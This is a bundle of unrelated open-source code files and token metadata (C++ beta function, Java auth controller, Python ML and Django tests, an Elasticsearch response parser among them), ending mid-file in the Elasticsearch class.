{"symbol": "COMET","address": "0x4ceE978c126c43522765dE9ed02D9373C72AC290","overview":{"en": "Comet is a self-destructing currency with each transfer burns 1.4% of the amount transferred."},"email": "<EMAIL>","website": "https://comet14.com/","state": "NORMAL","links": {"blog": "","twitter": "https://twitter.com/comet_token?s=09","telegram": "https://t.me/Cometgroup","github": "https://github.com/comet14/Cometcontract/blob/master/cometcontractcode"}}
158
571
#include "consts.hpp" #include "gamma.hpp" #include <math.h> #include <limits> #include <boost/numeric/conversion/cast.hpp> namespace cephes { constexpr double ASYMP_FACTOR = 1e6; double lbeta_asymp(double a, double b, int *sgn); double lbeta_negint(int a, double b); double beta_negint(int a, double b); double beta(double a, double b) { double y; int sign = 1; if (a <= 0.0) { if (a == std::floor(a)) { if (a == boost::numeric_cast<int>(a)) { return beta_negint(boost::numeric_cast<int>(a), b); } else { goto overflow; } } } if (b <= 0.0) { if (b == std::floor(b)) { if (b == boost::numeric_cast<int>(b)) { return beta_negint(boost::numeric_cast<int>(b), a); } else { goto overflow; } } } if (std::fabs(a) < std::fabs(b)) { y = a; a = b; b = y; } if (std::fabs(a) > ASYMP_FACTOR * std::fabs(b) && a > ASYMP_FACTOR) { /* Avoid loss of precision in lgam(a + b) - lgam(a) */ y = lbeta_asymp(a, b, &sign); return sign * std::exp(y); } y = a + b; if (std::fabs(y) > MAXGAM || std::fabs(a) > MAXGAM || std::fabs(b) > MAXGAM) { int sgngam; y = lgam_sgn(y, &sgngam); sign *= sgngam; /* keep track of the sign */ y = lgam_sgn(b, &sgngam) - y; sign *= sgngam; y = lgam_sgn(a, &sgngam) + y; sign *= sgngam; if (y > MAXLOG) { goto overflow; } return (sign * std::exp(y)); } y = Gamma(y); a = Gamma(a); b = Gamma(b); if (y == 0.0) goto overflow; if (std::fabs(std::fabs(a) - std::fabs(y)) > std::fabs(std::fabs(b) - std::fabs(y))) { y = b / y; y *= a; } else { y = a / y; y *= b; } return (y); overflow: return (sign * std::numeric_limits<double>::infinity()); } /* Natural log of |beta|. */ double lbeta(double a, double b) { double y; int sign; sign = 1; if (a <= 0.0) { if (a == std::floor(a)) { if (a == boost::numeric_cast<int>(a)) { return lbeta_negint(boost::numeric_cast<int>(a), b); } else { goto over; } } } if (b <= 0.0) { if (b == std::floor(b)) { if (b == boost::numeric_cast<int>(b)) { return lbeta_negint(boost::numeric_cast<int>(b), a); } else { goto over; } } } if (std::fabs(a) < std::fabs(b)) { y = a; a = b; b = y; } if (std::fabs(a) > ASYMP_FACTOR * std::fabs(b) && a > ASYMP_FACTOR) { /* Avoid loss of precision in lgam(a + b) - lgam(a) */ y = lbeta_asymp(a, b, &sign); return y; } y = a + b; if (std::fabs(y) > MAXGAM || std::fabs(a) > MAXGAM || std::fabs(b) > MAXGAM) { int sgngam; y = lgam_sgn(y, &sgngam); sign *= sgngam; /* keep track of the sign */ y = lgam_sgn(b, &sgngam) - y; sign *= sgngam; y = lgam_sgn(a, &sgngam) + y; sign *= sgngam; return (y); } y = Gamma(y); a = Gamma(a); b = Gamma(b); if (y == 0.0) { over: return (sign * std::numeric_limits<double>::infinity()); } if (std::fabs(std::fabs(a) - std::fabs(y)) > std::fabs(std::fabs(b) - std::fabs(y))) { y = b / y; y *= a; } else { y = a / y; y *= b; } if (y < 0) { y = -y; } return std::log(y); } /* * Asymptotic expansion for ln(|B(a, b)|) for a > ASYMP_FACTOR*max(|b|, 1). */ double lbeta_asymp(double a, double b, int *sgn) { double r = lgam_sgn(b, sgn); r -= b * std::log(a); r += b*(1-b)/(2*a); r += b*(1-b)*(1-2*b)/(12*a*a); r += - b*b*(1-b)*(1-b)/(12*a*a*a); return r; } /* * Special case for a negative integer argument */ double beta_negint(int a, double b) { int sgn; if (b == boost::numeric_cast<int>(b) && 1 - a - b > 0) { sgn = (boost::numeric_cast<int>(b) % 2 == 0) ? 1 : -1; return sgn * beta(1 - a - b, b); } else { return std::numeric_limits<double>::infinity(); } } double lbeta_negint(int a, double b) { double r; if (b == boost::numeric_cast<int>(b) && 1 - a - b > 0) { r = lbeta(1 - a - b, b); return r; } else { return std::numeric_limits<double>::infinity(); } } }
2,467
32,544
package com.baeldung.controllers; import br.com.caelum.vraptor.*; import br.com.caelum.vraptor.freemarker.FreemarkerView; import br.com.caelum.vraptor.validator.Validator; import com.baeldung.config.UserInfo; import com.baeldung.daos.UserDao; import com.baeldung.models.User; import org.mindrot.jbcrypt.BCrypt; import javax.inject.Inject; import javax.servlet.http.HttpServletRequest; import java.util.Objects; import java.util.logging.Logger; @Controller public class AuthController { private Validator validator; private UserDao userDao; private Result result; private UserInfo userInfo; private Logger logger = Logger.getLogger(getClass().getName()); public AuthController() { this(null, null, null, null); } @Inject public AuthController(Validator validator, UserDao userDao, Result result, UserInfo userInfo) { this.validator = validator; this.userDao = userDao; this.result = result; this.userInfo = userInfo; } @Get("/register") public void registrationForm() { result.use(FreemarkerView.class).withTemplate("auth/register"); } @Post("/register") public void register(User user, HttpServletRequest request) { validator.validate(user); if(validator.hasErrors()) { result.include("errors", validator.getErrors()); } validator.onErrorRedirectTo(this).registrationForm(); if(!user.getPassword() .equals(request.getParameter("password_confirmation"))) { result.include("error", "Passwords Do Not Match"); result.redirectTo(this).registrationForm(); } user.setPassword( BCrypt.hashpw(user.getPassword(), BCrypt.gensalt())); Object resp = userDao.add(user); if(resp != null) { result.include("status", "Registration Successful! Now Login"); result.redirectTo(this).loginForm(); } else { result.include("error", "There was an error during registration"); result.redirectTo(this).registrationForm(); } } @Get("/login") public void loginForm() { result.use(FreemarkerView.class).withTemplate("auth/login"); } @Post("/login") public void login(HttpServletRequest request) { String password = request.getParameter("user.password"); String email = request.getParameter("user.email"); if(email.isEmpty() || password.isEmpty()) { result.include("error", "Email/Password is Required!"); result.redirectTo(AuthController.class).loginForm(); } User user = userDao.findByEmail(email); if(user != null && BCrypt.checkpw(password, user.getPassword())) { userInfo.setUser(user); result.include("status", "Login Successful!"); result.redirectTo(IndexController.class).index(); } else { result.include("error", "Email/Password Does Not Match!"); result.redirectTo(AuthController.class).loginForm(); } } }
1,254
678
<reponame>bzxy/cydia<gh_stars>100-1000 /** * This header is generated by class-dump-z 0.2b. * * Source: /System/Library/PrivateFrameworks/iTunesStore.framework/iTunesStore */ #import <iTunesStore/ISOperation.h> @class NSString; @interface ISSetApplicationBadgeOperation : ISOperation { id _badgeValue; // 60 = 0x3c NSString *_bundleIdentifier; // 64 = 0x40 } @property(retain) NSString *bundleIdentifier; // G=0x21675; S=0x21689; @synthesize=_bundleIdentifier @property(retain) id badgeValue; // G=0x2163d; S=0x21651; @synthesize=_badgeValue // declared property setter: - (void)setBundleIdentifier:(id)identifier; // 0x21689 // declared property getter: - (id)bundleIdentifier; // 0x21675 // declared property setter: - (void)setBadgeValue:(id)value; // 0x21651 // declared property getter: - (id)badgeValue; // 0x2163d - (id)uniqueKey; // 0x21631 - (void)run; // 0x214d5 - (void)dealloc; // 0x21475 @end
362
17,085
<filename>python/paddle/fluid/tests/unittests/test_save_model_without_var.py # Copyright (c) 2019 PaddlePaddle Authors. All Rights Reserved. # # Licensed under the Apache License, Version 2.0 (the "License"); # you may not use this file except in compliance with the License. # You may obtain a copy of the License at # # http://www.apache.org/licenses/LICENSE-2.0 # # Unless required by applicable law or agreed to in writing, software # distributed under the License is distributed on an "AS IS" BASIS, # WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. # See the License for the specific language governing permissions and # limitations under the License. import numpy as np import warnings import unittest import paddle import paddle.fluid as fluid from paddle.fluid.layers.device import get_places from paddle.fluid.executor import as_numpy class TestSaveModelWithoutVar(unittest.TestCase): def test_no_var_save(self): data = fluid.layers.data( name='data', shape=[-1, 1], dtype='float32', append_batch_size=False) data_plus = data + 1 if fluid.core.is_compiled_with_cuda(): place = fluid.core.CUDAPlace(0) else: place = fluid.core.CPUPlace() exe = fluid.Executor(place) exe.run(fluid.default_startup_program()) with warnings.catch_warnings(record=True) as w: warnings.simplefilter("always") fluid.io.save_inference_model( dirname='test', feeded_var_names=['data'], target_vars=[data_plus], executor=exe, model_filename='model', params_filename='params') expected_warn = "no variable in your model, please ensure there are any variables in your model to save" self.assertTrue(len(w) > 0) self.assertTrue(expected_warn == str(w[-1].message)) if __name__ == '__main__': unittest.main()
813
887
<filename>javers-core/src/main/java/org/javers/core/metamodel/type/MapContentType.java package org.javers.core.metamodel.type; /** * @author <NAME> */ public class MapContentType { private final JaversType keyType; private final JaversType valueType; public MapContentType(JaversType keyType, JaversType valueType) { this.keyType = keyType; this.valueType = valueType; } public JaversType getKeyType() { return keyType; } public JaversType getValueType() { return valueType; } }
214
602
package org.automon.implementations; import org.junit.After; import org.junit.Before; import org.junit.Test; import static org.assertj.core.api.Assertions.assertThat; import static org.mockito.Mockito.mock; public class OpenMonFactoryTest { private OpenMonFactory factory; private OpenMon defaultValue = mock(OpenMon.class); @Before public void setUp() throws Exception { factory = new OpenMonFactory(defaultValue); } @After public void tearDown() throws Exception { } @Test public void testDefault() throws Exception { // test valid values loaded by default with fully qualified class path. assertThat(factory.getInstance(OpenMonFactory.JAMON)).isInstanceOf(Jamon.class); assertThat(factory.getInstance(OpenMonFactory.JAVA_SIMON)).isInstanceOf(JavaSimon.class); assertThat(factory.getInstance(OpenMonFactory.METRICS)).isInstanceOf(Metrics.class); assertThat(factory.getInstance(OpenMonFactory.SYSOUT)).isInstanceOf(SysOut.class); assertThat(factory.getInstance(OpenMonFactory.NULL_IMP)).isInstanceOf(NullImp.class); assertThat(factory.getInstance(OpenMonFactory.NEW_RELIC)).isInstanceOf(NewRelicImp.class); assertThat(factory.getInstance(OpenMonFactory.STATSD)).isInstanceOf(StatsD.class); // test getting instance with the class name only (case insensitive) assertThat(factory.getInstance("jamon")).isInstanceOf(Jamon.class); assertThat(factory.getInstance("JAMon")).isInstanceOf(Jamon.class); assertThat(factory.getInstance("com.i.do.not.Exist")). describedAs("The default value should be returned if the constructor fails"). isEqualTo(defaultValue); } @Test public void testAddMultiple() throws Exception { factory.reset(); factory.add(OpenMonFactory.JAMON, OpenMonFactory.JAVA_SIMON); assertThat(factory.getInstance(OpenMonFactory.JAMON)).isInstanceOf(Jamon.class); assertThat(factory.getInstance(OpenMonFactory.JAVA_SIMON)).isInstanceOf(JavaSimon.class); assertThat(factory.getInstance("I_DO_NOT_EXIST")).isEqualTo(defaultValue); } @Test public void testGetLastToken() throws Exception { assertThat(OpenMonFactory.getJustClassName("com.mypackage.Jamon")).isEqualTo("Jamon"); assertThat(OpenMonFactory.getJustClassName("Jamon")).isEqualTo("Jamon"); } @Test public void testToString() throws Exception { assertThat(factory.toString()).contains("jamon, javasimon, metrics, micrometer, newrelicimp, nullimp, statsd, sysout"); } @Test public void testGetFirstInstance() throws Exception { assertThat(factory.getFirstInstance()).isNotNull(); assertThat(factory.getFirstInstance()).isNotEqualTo(defaultValue); } }
1,046
852
#include "CondFormats/L1TObjects/interface/L1TriggerKeyExt.h" #include "FWCore/Utilities/interface/typelookup.h" TYPELOOKUP_DATA_REG(L1TriggerKeyExt);
61
1,068
import math import numpy as np import torch import gpytorch from gpytorch.models import AbstractVariationalGP from gpytorch.variational import (CholeskyVariationalDistribution, VariationalStrategy, AdditiveGridInterpolationVariationalStrategy) from gpytorch.mlls.variational_elbo import VariationalELBO from gpytorch.utils.grid import choose_grid_size """ Binary classifier with implementation of Stochastic-variational deep kernel learning https://arxiv.org/abs/1611.00336 """ class NeuralNetLayer(torch.nn.Sequential): """Fully connected network: features extractor layer""" def __init__(self, data_dim, output_dim): """Full connected network input->200->100->50->2 """ super(NeuralNetLayer, self).__init__() self.add_module('linear1', torch.nn.Linear(data_dim, 200)) self.add_module('bn1', torch.nn.BatchNorm1d(200)) self.add_module('relu1', torch.nn.ReLU()) self.add_module('linear2', torch.nn.Linear(200, 100)) self.add_module('bn2', torch.nn.BatchNorm1d(100)) self.add_module('relu2', torch.nn.ReLU()) self.add_module('linear3', torch.nn.Linear(100, 50)) self.add_module('bn3', torch.nn.BatchNorm1d(50)) self.add_module('relu3', torch.nn.ReLU()) self.add_module('linear4', torch.nn.Linear(50,output_dim)) # GP layer class GaussianProcessLayer(AbstractVariationalGP): """Gaussian Process layer using additive covariance kernel sturcture""" def __init__( self, num_dim, grid_bounds, grid_size, num_mixtures): """Initialize Gaussian process layer Args: num_dim(int): data input dimension grid_bound(tuple): bound of the grid, entries,represent min/max values of each dimensionn and represent number of inducing points grid_size(int): size of grid in each dimension num_mixture(int): number of mixture components """ variational_distribution = CholeskyVariationalDistribution( num_inducing_points=grid_size, batch_size=num_dim ) variational_strategy = AdditiveGridInterpolationVariationalStrategy( self, grid_size=grid_size, grid_bounds=[grid_bounds], num_dim=num_dim, variational_distribution=variational_distribution ) super(GaussianProcessLayer,self).__init__(variational_strategy) self.covar_module = gpytorch.kernels.SpectralMixtureKernel(num_mixtures=num_mixtures, ard_dum_dims=num_dim) self.mean_module = gpytorch.means.ConstantMean() self.grid_bounds = grid_bounds def forward(self,x): """Forward pass""" """ Args: x(pytorch tensor): training input """ mean = self.mean_module(x) covar = self.covar_module(x) return gpytorch.distributions.MultivariateNormal(mean, covar) # SV-DKL model class DKLModel(gpytorch.Module): def __init__( self, nnet_layer, num_dim, grid_bounds, grid_size, num_mixtures): """SV-DKL model Args: nnet_layer(pytorch neural net): feature extractor num_dim(int): data input dimension grid_bound(tuple): bound of the grid, entries,represent min/max values of each dimension and represent number of inducing points grid_size(int): size of grid in each dimension num_mixture(int): number of mixture components """ super(DKLModel, self).__init__() self.nnet_layer = nnet_layer self.gp_layer = GaussianProcessLayer(num_dim=num_dim, grid_bounds=grid_bounds, grid_size=grid_size, num_mixtures=num_mixtures ) self.grid_bounds = grid_bounds def forward(self,x): """Forward pass""" """ Args: x(pytorch tensor): training input """ features = self.nnet_layer(x) features = gpytorch.utils.grid.scale_to_bounds( features, self.grid_bounds[0], self.grid_bounds[1] ) res = self.gp_layer(features) return res
2,665
5,169
{ "name": "QCloudSDK", "version": "1.1.4.2", "summary": "QCloud SDK for iOS.", "homepage": "https://github.com/shingwasix/QCloudSDK", "license": { "type": "Copyright", "text": "Copyright ©2013-2016 Qcloud.com" }, "authors": { "<NAME>": "http://github.com/shingwasix" }, "source": { "http": "https://mc.qcloudimg.com/static/archive/a78a41f6eb769e421aa41fa607bc1501/qcloud-image-ios-v1.1.4.2.zip", "sha1": "a245280e55dcf2e60a53c38161b792f781d71b70" }, "platforms": { "ios": "5.0" }, "frameworks": [ "SystemConfiguration", "CoreTelephony" ], "pod_target_xcconfig": { "OTHER_LDFLAGS": "-lObjC" }, "default_subspecs": [ "Upload", "Download" ], "subspecs": [ { "name": "Upload", "libraries": [ "stdc++.6", "z" ], "source_files": "qcloud-image-ios-v1.1.4.2/QCloudUploadSDK/*.h", "vendored_libraries": "qcloud-image-ios-v1.1.4.2/QCloudUploadSDK/bitcode/真机&模拟器/*.a", "public_header_files": "qcloud-image-ios-v1.1.4.2/QCloudUploadSDK/*.h" }, { "name": "Download", "frameworks": "MobileCoreServices", "libraries": [ "stdc++.6", "xml2", "z" ], "source_files": "qcloud-image-ios-v1.1.4.2/QCloudDownloadSDK/真机&模拟器/QCloudDownloadSDK/Headers/*.h", "vendored_libraries": "qcloud-image-ios-v1.1.4.2/QCloudDownloadSDK/真机&模拟器/QCloudDownloadSDK/*.a", "public_header_files": "qcloud-image-ios-v1.1.4.2/QCloudDownloadSDK/真机&模拟器/QCloudDownloadSDK/Headers/*.h" } ] }
829
594
#define FIELDS2 long long l; #include "20040629-1.c"
23
764
{"symbol": "GRID","address": "0x12B19D3e2ccc14Da04FAe33e63652ce469b3F2FD","overview":{"en": ""},"email": "<EMAIL>","website": "https://gridplus.io","state": "NORMAL","links": {"blog": "https://blog.gridplus.io/","twitter": "https://twitter.com/gridplus","telegram": "https://gridplus.io/telegram","github": "https://github.com/gridplus"}}
126
61,676
<filename>tests/check_framework/test_4_0_compatibility.py from django.core.checks import Error from django.core.checks.compatibility.django_4_0 import ( check_csrf_trusted_origins, ) from django.test import SimpleTestCase from django.test.utils import override_settings class CheckCSRFTrustedOrigins(SimpleTestCase): @override_settings(CSRF_TRUSTED_ORIGINS=['example.com']) def test_invalid_url(self): self.assertEqual(check_csrf_trusted_origins(None), [ Error( 'As of Django 4.0, the values in the CSRF_TRUSTED_ORIGINS ' 'setting must start with a scheme (usually http:// or ' 'https://) but found example.com. See the release notes for ' 'details.', id='4_0.E001', ) ]) @override_settings( CSRF_TRUSTED_ORIGINS=['http://example.com', 'https://example.com'], ) def test_valid_urls(self): self.assertEqual(check_csrf_trusted_origins(None), [])
446
392
<filename>tests/test_propensityselect.py from nose.tools import * import numpy as np import causalinference.core.data as d import causalinference.core.propensity as p from utils import random_data def test_get_excluded_lin(): K1 = 4 included1 = [] ans1 = [0, 1, 2, 3] assert_equal(p.get_excluded_lin(K1, included1), ans1) K2 = 4 included2 = [3, 1] ans2 = [0, 2] assert_equal(p.get_excluded_lin(K2, included2), ans2) K3 = 3 included3 = [0, 1, 2] ans3 = [] assert_equal(p.get_excluded_lin(K3, included3), ans3) def test_get_excluded_qua(): lin1 = [0, 2, 3] qua1 = [(0, 3), (3, 3)] ans1 = [(0, 0), (0, 2), (2, 2), (2, 3)] assert_equal(p.get_excluded_qua(lin1, qua1), ans1) lin2 = [1, 2] qua2 = [] ans2 = [(1, 1), (1, 2), (2, 2)] assert_equal(p.get_excluded_qua(lin2, qua2), ans2) lin3 = [8, 5] qua3 = [(8, 8), (8, 5), (5, 5)] ans3 = [] assert_equal(p.get_excluded_qua(lin3, qua3), ans3) def test_calc_loglike(): X_c = np.array([[1, 2], [3, 7]]) X_t = np.array([[1, 4], [3, 6]]) lin = [1] qua = [(0, 0)] ans = -2.567814 assert np.allclose(p.calc_loglike(X_c, X_t, lin, qua), ans) def test_select_lin(): Y, D, X = random_data(K=4) X_c_random, X_t_random = X[D==0], X[D==1] lin1 = [0, 1, 2, 3] C1 = np.random.rand(1) ans1 = [0, 1, 2, 3] assert_equal(p.select_lin(X_c_random, X_t_random, lin1, C1), ans1) X_c = np.array([[1, 2], [9, 7]]) X_t = np.array([[1, 4], [9, 6]]) lin2 = [] C2 = 0.07 ans2 = [] assert_equal(p.select_lin(X_c, X_t, lin2, C2), ans2) lin3 = [] C3 = 0.06 ans3 = [1, 0] assert_equal(p.select_lin(X_c, X_t, lin3, C3), ans3) lin4 = [1] C4 = 0.35 ans4 = [1] assert_equal(p.select_lin(X_c, X_t, lin4, C4), ans4) lin5 = [1] C5 = 0.34 ans5 = [1, 0] assert_equal(p.select_lin(X_c, X_t, lin5, C5), ans5) def test_select_lin_terms(): Y, D, X = random_data(K=4) X_c_random, X_t_random = X[D==0], X[D==1] lin1 = [3, 0, 1] C1 = np.inf ans1 = [3, 0, 1] assert_equal(p.select_lin_terms(X_c_random, X_t_random, lin1, C1), ans1) lin2 = [2] C2 = 0 ans2 = [2, 0, 1, 3] assert_equal(p.select_lin_terms(X_c_random, X_t_random, lin2, C2), ans2) lin3 = [] C3 = 0 ans3 = [0, 1, 2, 3] assert_equal(p.select_lin_terms(X_c_random, X_t_random, lin3, C3), ans3) lin4 = [3, 1] C4 = -34.234 ans4 = [3, 1, 0, 2] assert_equal(p.select_lin_terms(X_c_random, X_t_random, lin4, C4), ans4) X_c = np.array([[1, 2], [9, 7]]) X_t = np.array([[1, 4], [9, 7]]) lin5 = [] C5 = 0.06 ans5 = [1, 0] assert_equal(p.select_lin_terms(X_c, X_t, lin5, C5), ans5) def test_select_qua(): Y, D, X = random_data() X_c_random, X_t_random = X[D==0], X[D==1] lin1 = [1, 0] qua1 = [(1, 0), (0, 0), (1, 1)] C1 = np.random.rand(1) ans1 = [(1, 0), (0, 0), (1, 1)] assert_equal(p.select_qua(X_c_random, X_t_random, lin1, qua1, C1), ans1) lin2 = [1] qua2 = [(1, 1)] C2 = np.random.rand(1) ans2 = [(1, 1)] assert_equal(p.select_qua(X_c_random, X_t_random, lin2, qua2, C2), ans2) X_c = np.array([[7, 8], [3, 10], [7, 10]]) X_t = np.array([[4, 7], [5, 10], [9, 8]]) lin3 = [0, 1] qua3 = [] C3 = 1.2 ans3 = [] assert_equal(p.select_qua(X_c, X_t, lin3, qua3, C3), ans3) lin4 = [0, 1] qua4 = [] C4 = 1.1 ans4 = [(1, 1), (0, 1), (0, 0)] assert_equal(p.select_qua(X_c, X_t, lin4, qua4, C4), ans4) lin5 = [0, 1] qua5 = [(1, 1)] C5 = 2.4 ans5 = [(1, 1)] assert_equal(p.select_qua(X_c, X_t, lin5, qua5, C5), ans5) lin6 = [0, 1] qua6 = [(1, 1)] C6 = 2.3 ans6 = [(1, 1), (0, 1), (0, 0)] assert_equal(p.select_qua(X_c, X_t, lin6, qua6, C6), ans6) lin7 = [0, 1] qua7 = [(1, 1), (0, 1)] C7 = 3.9 ans7 = [(1, 1), (0, 1)] assert_equal(p.select_qua(X_c, X_t, lin7, qua7, C7), ans7) lin8 = [0, 1] qua8 = [(1, 1), (0, 1)] C8 = 3.8 ans8 = [(1, 1), (0, 1), (0, 0)] assert_equal(p.select_qua(X_c, X_t, lin8, qua8, C8), ans8) def test_select_qua_terms(): Y, D, X = random_data() X_c_random, X_t_random = X[D==0], X[D==1] lin1 = [0, 1] C1 = np.inf ans1 = [] assert_equal(p.select_qua_terms(X_c_random, X_t_random, lin1, C1), ans1) lin2 = [1, 0] C2 = 0 ans2 = [(1, 1), (1, 0), (0, 0)] assert_equal(p.select_qua_terms(X_c_random, X_t_random, lin2, C2), ans2) lin3 = [0] C3 = -983.340 ans3 = [(0, 0)] assert_equal(p.select_qua_terms(X_c_random, X_t_random, lin3, C3), ans3) lin4 = [] C4 = 34.234 ans4 = [] assert_equal(p.select_qua_terms(X_c_random, X_t_random, lin4, C4), ans4) X_c = np.array([[7, 8], [3, 10], [7, 10]]) X_t = np.array([[4, 7], [5, 10], [9, 8]]) lin5 = [0, 1] C5 = 1.1 ans5 = [(1, 1), (0, 1), (0, 0)] assert_equal(p.select_qua_terms(X_c, X_t, lin5, C5), ans5) def test_propensityselect(): D = np.array([0, 0, 0, 1, 1, 1]) X = np.array([[7, 8], [3, 10], [7, 10], [4, 7], [5, 10], [9, 8]]) Y = random_data(D_cur=D, X_cur=X) data = d.Data(Y, D, X) propensity1 = p.PropensitySelect(data, [], 1, 2.71) lin1 = [1] qua1 = [] coef1 = np.array([6.5424027, -0.7392041]) loglike1 = -3.627939 fitted1 = np.array([0.6522105, 0.2995088, 0.2995088, 0.7970526, 0.2995088, 0.6522105]) se1 = np.array([6.8455179, 0.7641445]) keys = {'lin', 'qua', 'coef', 'loglike', 'fitted', 'se'} assert_equal(propensity1['lin'], lin1) assert_equal(propensity1['qua'], qua1) assert np.allclose(propensity1['coef'], coef1) assert np.allclose(propensity1['loglike'], loglike1) assert np.allclose(propensity1['fitted'], fitted1) assert np.allclose(propensity1['se'], se1) assert_equal(set(propensity1.keys()), keys) propensity2 = p.PropensitySelect(data, [0, 1], 1, 2.71) lin2 = [0, 1] qua2 = [] coef2 = np.array([6.8066090, -0.0244874, -0.7524939]) loglike2 = -3.626517 fitted2 = np.array([0.6491366, 0.3117840, 0.2911631, 0.8086407, 0.3013733, 0.6379023]) se2 = np.array([8.5373779, 0.4595191, 0.8106499]) assert_equal(propensity2['lin'], lin2) assert_equal(propensity2['qua'], qua2) assert np.allclose(propensity2['coef'], coef2) assert np.allclose(propensity2['loglike'], loglike2) assert np.allclose(propensity2['fitted'], fitted2) assert np.allclose(propensity2['se'], se2)
3,192
1,150
import os import numpy as np import paddle def match_state_dict(model_state_dict, weight_state_dict): """ Match between the model state dict and pretrained weight state dict. Return the matched state dict. The method supposes that all the names in pretrained weight state dict are subclass of the names in models`, if the prefix 'backbone.' in pretrained weight keys is stripped. And we could get the candidates for each model key. Then we select the name with the longest matched size as the final match result. For example, the model state dict has the name of 'backbone.res2.res2a.branch2a.conv.weight' and the pretrained weight as name of 'res2.res2a.branch2a.conv.weight' and 'branch2a.conv.weight'. We match the 'res2.res2a.branch2a.conv.weight' to the model key. """ model_keys = sorted(model_state_dict.keys()) weight_keys = sorted(weight_state_dict.keys()) def match(a, b): if a.startswith('backbone.res5'): # In Faster RCNN, res5 pretrained weights have prefix of backbone, # however, the corresponding model weights have difficult prefix, # bbox_head. b = b[9:] return a == b or a.endswith("." + b) match_matrix = np.zeros([len(model_keys), len(weight_keys)]) for i, m_k in enumerate(model_keys): for j, w_k in enumerate(weight_keys): if match(m_k, w_k): match_matrix[i, j] = len(w_k) max_id = match_matrix.argmax(1) max_len = match_matrix.max(1) max_id[max_len == 0] = -1 matched_keys = {} result_state_dict = {} for model_id, weight_id in enumerate(max_id): if weight_id == -1: continue model_key = model_keys[model_id] weight_key = weight_keys[weight_id] weight_value = weight_state_dict[weight_key] model_value_shape = list(model_state_dict[model_key].shape) if list(weight_value.shape) != model_value_shape: print( 'The shape {} in pretrained weight {} is unmatched with ' 'the shape {} in model {}. And the weight {} will not be ' 'loaded'.format(weight_value.shape, weight_key, model_value_shape, model_key, weight_key)) continue assert model_key not in result_state_dict result_state_dict[model_key] = weight_value if weight_key in matched_keys: raise ValueError('Ambiguity weight {} loaded, it matches at least ' '{} and {} in the model'.format( weight_key, model_key, matched_keys[ weight_key])) matched_keys[weight_key] = model_key return result_state_dict def _strip_postfix(path): path, ext = os.path.splitext(path) assert ext in ['', '.pdparams', '.pdopt', '.pdmodel'], \ "Unknown postfix {} from weights".format(ext) return path def load_pretrain_weight(model, pretrain_weight): path = _strip_postfix(pretrain_weight) if not (os.path.isdir(path) or os.path.isfile(path) or os.path.exists(path + '.pdparams')): raise ValueError("Model pretrain path `{}` does not exists. " "If you don't want to load pretrain model, " "please delete `pretrain_weights` field in " "config file.".format(path)) model_dict = model.state_dict() weights_path = path + '.pdparams' param_state_dict = paddle.load(weights_path) param_state_dict = match_state_dict(model_dict, param_state_dict) model.set_dict(param_state_dict) print('Finish loading model weights: {}'.format(weights_path)) def load_weights(model, weights): start_epoch = 0 load_pretrain_weight(model, weights) print("Load weights {} to start training".format(weights))
1,667
1,125
/* * Licensed to Elasticsearch under one or more contributor * license agreements. See the NOTICE file distributed with * this work for additional information regarding copyright * ownership. Elasticsearch licenses this file to you under * the Apache License, Version 2.0 (the "License"); you may * not use this file except in compliance with the License. * You may obtain a copy of the License at * * http://www.apache.org/licenses/LICENSE-2.0 * * Unless required by applicable law or agreed to in writing, * software distributed under the License is distributed on an * "AS IS" BASIS, WITHOUT WARRANTIES OR CONDITIONS OF ANY * KIND, either express or implied. See the License for the * specific language governing permissions and limitations * under the License. */ package org.elasticsearch.client.migration; import org.elasticsearch.common.Nullable; import org.elasticsearch.common.ParseField; import org.elasticsearch.common.xcontent.ConstructingObjectParser; import org.elasticsearch.common.xcontent.XContentParser; import java.io.IOException; import java.util.ArrayList; import java.util.HashMap; import java.util.List; import java.util.Locale; import java.util.Map; import java.util.Objects; public class DeprecationInfoResponse { private static final ParseField CLUSTER_SETTINGS = new ParseField("cluster_settings"); private static final ParseField NODE_SETTINGS = new ParseField("node_settings"); private static final ParseField INDEX_SETTINGS = new ParseField("index_settings"); private static final ParseField ML_SETTINGS = new ParseField("ml_settings"); private final List<DeprecationIssue> clusterSettingsIssues; private final List<DeprecationIssue> nodeSettingsIssues; private final Map<String, List<DeprecationIssue>> indexSettingsIssues; private final List<DeprecationIssue> mlSettingsIssues; public DeprecationInfoResponse(List<DeprecationIssue> clusterSettingsIssues, List<DeprecationIssue> nodeSettingsIssues, Map<String, List<DeprecationIssue>> indexSettingsIssues, List<DeprecationIssue> mlSettingsIssues) { this.clusterSettingsIssues = Objects.requireNonNull(clusterSettingsIssues, "cluster settings issues cannot be null"); this.nodeSettingsIssues = Objects.requireNonNull(nodeSettingsIssues, "node settings issues cannot be null"); this.indexSettingsIssues = Objects.requireNonNull(indexSettingsIssues, "index settings issues cannot be null"); this.mlSettingsIssues = Objects.requireNonNull(mlSettingsIssues, "ml settings issues cannot be null"); } public List<DeprecationIssue> getClusterSettingsIssues() { return clusterSettingsIssues; } public List<DeprecationIssue> getNodeSettingsIssues() { return nodeSettingsIssues; } public Map<String, List<DeprecationIssue>> getIndexSettingsIssues() { return indexSettingsIssues; } public List<DeprecationIssue> getMlSettingsIssues() { return mlSettingsIssues; } private static List<DeprecationIssue> parseDeprecationIssues(XContentParser parser) throws IOException { List<DeprecationIssue> issues = new ArrayList<>(); XContentParser.Token token = null; while ((token = parser.nextToken()) != XContentParser.Token.END_ARRAY) { if (token == XContentParser.Token.START_OBJECT) { issues.add(DeprecationIssue.PARSER.parse(parser, null)); } } return issues; } public static DeprecationInfoResponse fromXContent(XContentParser parser) throws IOException { Map<String, List<DeprecationIssue>> indexSettings = new HashMap<>(); List<DeprecationIssue> clusterSettings = new ArrayList<>(); List<DeprecationIssue> nodeSettings = new ArrayList<>(); List<DeprecationIssue> mlSettings = new ArrayList<>(); String fieldName = null; XContentParser.Token token; while ((token = parser.nextToken()) != XContentParser.Token.END_OBJECT) { if (token == XContentParser.Token.FIELD_NAME) { fieldName = parser.currentName(); } else if (CLUSTER_SETTINGS.getPreferredName().equals(fieldName)) { clusterSettings.addAll(parseDeprecationIssues(parser)); } else if (NODE_SETTINGS.getPreferredName().equals(fieldName)) { nodeSettings.addAll(parseDeprecationIssues(parser)); } else if (ML_SETTINGS.getPreferredName().equals(fieldName)) { mlSettings.addAll(parseDeprecationIssues(parser)); } else if (INDEX_SETTINGS.getPreferredName().equals(fieldName)) { // parse out the key/value pairs while ((token = parser.nextToken()) != XContentParser.Token.END_OBJECT) { String key = parser.currentName(); List<DeprecationIssue> value = parseDeprecationIssues(parser); if (value.size() > 0) { // only add indices that 